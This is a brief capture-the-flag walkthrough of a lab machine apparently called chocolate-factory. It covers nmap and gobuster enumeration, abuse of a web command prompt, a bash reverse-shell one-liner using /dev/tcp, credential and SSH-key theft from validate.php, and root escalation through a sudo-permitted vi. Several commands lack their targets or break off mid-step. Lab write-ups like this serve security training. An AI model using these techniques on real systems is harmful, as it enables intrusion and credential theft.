The first step of my enumeration was a scan with nmap. by the command:
nmap -sC -sV -n -Pn --reason
Port | Service |
21/tcp | FTP |
22/tcp | SSH |
80/tcp | HTTP |
100/tcp | newacct? |
106/tcp | pop3pw? |
109/tcp | pop2? |
110/tcp | pop3? |
111/tcp | rpcbind? |
113/tcp | ident? |
119/tcp | nntp? |
125/tcp | locus-map? |
I next decided to run a gobuster scan on the webserver to see if there were any interesting hidden directories, by the command:
gobuster dir -u -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x html,xml,php
The wordlist I choosed to run this scan can be found in danielmiessler's repository.
After we've completed our scan, we see a new page : "home.php" that allow you to submit commands via a prompt, I used the ls command and then the cat command to find the key in a file called key_rev_key.
bash -c 'exec bash -i &>/dev/tcp/ <&1'
I was looking with (www-html) user permission I found the password of charlie in the validate.php file:
and I also found an rsa key and i saved it in Desktop/rsa
ssh charlie@ -i rsa
cat /home/charlie/user.txt
I typed the famous:
sudo -l
and it returned:
User charlie may run the following commands on chocolate-factory:
(ALL : !root) NOPASSWD: /usr/bin/vi
So i run the command sa root and i typed
And i tried to find the root flag by :
find / root.txt
and i found: /root/ and I typed the key that i found in the first question:
Thanks for reading!!!
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